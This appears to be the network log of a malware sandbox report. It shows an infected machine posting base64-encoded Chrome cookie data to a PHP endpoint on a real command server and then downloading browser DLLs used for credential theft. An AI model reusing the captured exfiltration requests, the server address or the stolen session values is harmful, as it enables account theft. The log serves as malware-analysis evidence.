                                                                                                                                                                                                                                                                                                                                                                Data Raw: 2d 2d 2d 2d 2d 2d 47 49 45 48 4a 4b 45 42 41 41 45 42 47 43 41 41 45 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 66 35 39 66 36 64 31 39 35 30 63 65 33 31 65 65 34 36 65 66 66 38 66 35 66 65 61 61 31 30 36 62 33 33 32 39 64 36 62 37 32 31 30 62 33 62 64 61 39 63 37 36 38 31 32 39 36 35 36 39 35 62 36 61 39 37 66 39 64 62 33 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 48 4a 4b 45 42 41 41 45 42 47 43 41 41 45 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 48 4a 4b 45 42 41 41 45 42 47 43 41 41 45 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 52 6b 46 4d 55 30 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 7a 45 79 4d 6a 6b 77 4f 44 41 79 43 55 35 4a 52 41 6b 31 4d 54 45 39 56 55 4a 6c 54 6b 4e 72 57 6a 4e 4d 4f 48 6c 59 59 33 67 34 63 57 67 30 53 6b 5a 56 57 47 74 33 61 30 35 44 4f 55 6c 79 5a 47 6c 53 5a 47 4a 71 55 31 52 71 63 56 4e 70 52 6d 67 34 56 33 4a 53 59 32 4a 4c 63 6c 39 79 54 30 70 69 5a 30 68 5a 4e 6c 52 42 4e 46 4a 55 4c 54 5a 77 63 7a 42 69 61 47 56 74 5a 6e 64 44 55 45 4a 7a 54 45 31 6e 55 46 51 33 4c 57 64 55 59 31 64 78 53 48 5a 61 64 6c 70 69 59 57 5a 50 63 47 74 78 55 6e 6b 77 5a 45 78 35 57 55 63 35 51 57 70 51 4d 6e 5a 69 56 55 4a 76 62 57 46 79 62 6d 4d 35 63 47 4e 61 56 6d 78 6f 53 47 74 56 5a 56 56 68 56 30 31 31 63 6b 51 77 52 30 64 59 65 56 63 77 4e 56 39 43 58 7a 46 4a 65 56 56 4f 57 55 56 46 54 47 31 35 63 56 4a 6e 43 69 35 6e 62 32 39 6e 62 47 55 75 59 32 39 74 43 56 52 53 56 55 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 6a 6b 35 4d 44 63 78 4e 6a 51 77 43 54 46 51 58 30 70 42 55 67 6b 79 4d 44 49 7a 4c 54 45 77 4c 54 41 31 4c 54 41 32 43 67 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 48 4a 4b 45 42 41 41 45 42 47 43 41 41 45 42 46 48 2d 2d 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: ------GIEHJKEBAAEBGCAAEBFHContent-Disposition: form-data; name="token"7f59f6d1950ce31ee46eff8f5feaa106b3329d6b7210b3bda9c76812965695b6a97f9db3------GIEHJKEBAAEBGCAAEBFHContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------GIEHJKEBAAEBGCAAEBFHContent-Disposition: form-data; name="file"Lmdvb2dsZS5jb20JRkFMU0UJLwlGQUxTRQkxNzEyMjkwODAyCU5JRAk1MTE9VUJlTkNrWjNMOHlYY3g4cWg0SkZVWGt3a05DOUlyZGlSZGJqU1RqcVNpRmg4V3JSY2JLcl9yT0piZ0hZNlRBNFJULTZwczBiaGVtZndDUEJzTE1nUFQ3LWdUY1dxSHZadlpiYWZPcGtxUnkwZEx5WUc5QWpQMnZiVUJvbWFybmM5cGNaVmxoSGtVZVVhV011ckQwR0dYeVcwNV9CXzFJeVVOWUVFTG15cVJnCi5nb29nbGUuY29tCVRSVUUJLwlGQUxTRQkxNjk5MDcxNjQwCTFQX0pBUgkyMDIzLTEwLTA1LTA2Cg==------GIEHJKEBAAEBGCAAEBFH--
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:52.733498096 CET170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:12:52 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:52.866394043 CET560OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----GHDAAKJEGCFCAKEBKJJE
                                                                                                                                                                                                                                                                                                                                                                Host: 185.172.128.79
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 359
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 2d 2d 2d 2d 2d 2d 47 48 44 41 41 4b 4a 45 47 43 46 43 41 4b 45 42 4b 4a 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 66 35 39 66 36 64 31 39 35 30 63 65 33 31 65 65 34 36 65 66 66 38 66 35 66 65 61 61 31 30 36 62 33 33 32 39 64 36 62 37 32 31 30 62 33 62 64 61 39 63 37 36 38 31 32 39 36 35 36 39 35 62 36 61 39 37 66 39 64 62 33 0d 0a 2d 2d 2d 2d 2d 2d 47 48 44 41 41 4b 4a 45 47 43 46 43 41 4b 45 42 4b 4a 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 57 6c 74 5a 57 68 79 64 6e 70 76 5a 43 35 6d 61 57 78 6c 0d 0a 2d 2d 2d 2d 2d 2d 47 48 44 41 41 4b 4a 45 47 43 46 43 41 4b 45 42 4b 4a 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 47 48 44 41 41 4b 4a 45 47 43 46 43 41 4b 45 42 4b 4a 4a 45 2d 2d 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: ------GHDAAKJEGCFCAKEBKJJEContent-Disposition: form-data; name="token"7f59f6d1950ce31ee46eff8f5feaa106b3329d6b7210b3bda9c76812965695b6a97f9db3------GHDAAKJEGCFCAKEBKJJEContent-Disposition: form-data; name="file_name"ZWltZWhydnpvZC5maWxl------GHDAAKJEGCFCAKEBKJJEContent-Disposition: form-data; name="file"------GHDAAKJEGCFCAKEBKJJE--
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:53.200797081 CET170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:12:53 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:54.801529884 CET560OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----GCBFBGCGIJKJJKFIDBFC
                                                                                                                                                                                                                                                                                                                                                                Host: 185.172.128.79
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 359
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 2d 2d 2d 2d 2d 2d 47 43 42 46 42 47 43 47 49 4a 4b 4a 4a 4b 46 49 44 42 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 66 35 39 66 36 64 31 39 35 30 63 65 33 31 65 65 34 36 65 66 66 38 66 35 66 65 61 61 31 30 36 62 33 33 32 39 64 36 62 37 32 31 30 62 33 62 64 61 39 63 37 36 38 31 32 39 36 35 36 39 35 62 36 61 39 37 66 39 64 62 33 0d 0a 2d 2d 2d 2d 2d 2d 47 43 42 46 42 47 43 47 49 4a 4b 4a 4a 4b 46 49 44 42 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 57 6c 74 5a 57 68 79 64 6e 70 76 5a 43 35 6d 61 57 78 6c 0d 0a 2d 2d 2d 2d 2d 2d 47 43 42 46 42 47 43 47 49 4a 4b 4a 4a 4b 46 49 44 42 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 47 43 42 46 42 47 43 47 49 4a 4b 4a 4a 4b 46 49 44 42 46 43 2d 2d 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: ------GCBFBGCGIJKJJKFIDBFCContent-Disposition: form-data; name="token"7f59f6d1950ce31ee46eff8f5feaa106b3329d6b7210b3bda9c76812965695b6a97f9db3------GCBFBGCGIJKJJKFIDBFCContent-Disposition: form-data; name="file_name"ZWltZWhydnpvZC5maWxl------GCBFBGCGIJKJJKFIDBFCContent-Disposition: form-data; name="file"------GCBFBGCGIJKJJKFIDBFC--
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:55.129374027 CET170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:12:55 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:55.936182022 CET93OUTGET /15f649199f40275b/freebl3.dll HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: 185.172.128.79
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:56.256443977 CET1286INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:12:56 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 685392
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                                                                                                                                                                ETag: "a7550-5e7e950876500"
                                                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHSxFP/# @.text `.rdata @@.data<F0@.00cfg@@.rsrcx@@.reloc#$"@B
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:57.496983051 CET93OUTGET /15f649199f40275b/mozglue.dll HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: 185.172.128.79
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:57.818609953 CET1286INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:12:57 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 608080
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                                                                                                                                                                ETag: "94750-5e7e950876500"
                                                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W, P/0AShZ.texta `.rdata@@.dataD@.00cfg@@.tls@.rsrc @@.relocA0B@B
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:58.492691040 CET94OUTGET /15f649199f40275b/msvcp140.dll HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: 185.172.128.79
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:58.812927961 CET1286INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:12:58 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 450024
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                                                                                                                                                                ETag: "6dde8-5e7e950876500"
                                                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_PEL0]"!(`@,@AgrA=`x8w@pc@.text&( `.dataH)@,@.idatapD@@.didat4X@.rsrcZ@@.reloc=>^@B
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:59.349096060 CET90OUTGET /15f649199f40275b/nss3.dll HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: 185.172.128.79
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:59.670169115 CET1286INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:12:59 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 2046288
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                                                                                                                                                                ETag: "1f3950-5e7e950876500"
                                                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
